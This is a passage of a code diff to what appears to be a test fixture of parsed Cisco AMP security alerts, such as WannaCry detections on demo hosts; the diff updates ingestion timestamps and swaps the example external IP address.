@@ -2188,8 +2188,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103768528Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", + "ingested": "2021-12-09T13:35:51.461636400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2211,7 +2211,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2254,7 +2254,7 @@ "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2268,8 +2268,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103770531Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", + "ingested": "2021-12-09T13:35:51.461641200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2291,7 +2291,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2332,7 +2332,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2342,8 +2342,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103772565Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:51.461646400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2363,7 +2363,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2417,7 +2417,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2434,8 +2434,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103774575Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "ingested": "2021-12-09T13:35:51.461651400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2457,7 +2457,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2512,7 +2512,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2529,8 +2529,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103776615Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "ingested": "2021-12-09T13:35:51.461655300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2552,7 +2552,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -2606,7 +2606,7 @@
 "e889544aff85ffaf8b0d0da705105dee7c97fe26"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2619,8 +2619,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103778634Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "ingested": "2021-12-09T13:35:51.461659900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2642,7 +2642,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2701,7 +2701,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2718,8 +2718,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103780658Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:51.461665900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -2741,7 +2741,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "parent": {
@@ -2795,7 +2795,7 @@
 "e889544aff85ffaf8b0d0da705105dee7c97fe26"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2812,8 +2812,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103782670Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 